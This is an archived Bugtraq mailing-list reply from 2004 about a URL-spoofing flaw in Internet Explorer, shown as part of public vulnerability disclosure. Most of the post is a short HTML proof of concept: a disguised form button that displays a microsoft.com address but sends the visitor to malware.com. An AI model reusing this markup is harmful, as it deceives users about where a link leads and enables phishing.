Bugtraq: Re: New URL spoofing bug in Microsoft Internet Explorer

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Re: New URL spoofing bug in Microsoft Internet Explorer

From: "http-equiv () excite com " <1 () malware com>
Date: Sat, 30 Oct 2004 18:16:07 -0000



I also want to play

<base href="http://www.microsoft.com";>

<a href=><form action="http://www.malware.com"; 
method="get"><INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; 
FONT-SIZE: 10pt; BORDER-LEFT: 0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: 
transparent;TEXT-DECORATION: underline" type=submit 
value=http://www.microsoft.com></form></a>

This still works in IE 6 SP2 XP 123 whatever, since patched and 
from back in March 2004 [see: 
http://www.securityfocus.com/bid/10023 ]. Only difference being 
the base href and open a href.

http://www.malware.com/mwaresoft.html

Interestingly Outlook Express gets it right this time.



-- 
http://www.malware.com

By Date By Thread

Current thread:

Re: New URL spoofing bug in Microsoft Internet Explorer, (continued)
- Re: New URL spoofing bug in Microsoft Internet Explorer Christopher J. Pilkington (Oct 29)
- Re: New URL spoofing bug in Microsoft Internet Explorer GuidoZ (Oct 29)
  - Re: New URL spoofing bug in Microsoft Internet Explorer GuidoZ (Oct 30)
- Re: New URL spoofing bug in Microsoft Internet Explorer Jérôme (Oct 29)
- Re: New URL spoofing bug in Microsoft Internet Explorer 0-1-2-3 (Oct 30)
- Re: New URL spoofing bug in Microsoft Internet Explorer http-equiv () excite com (Oct 30)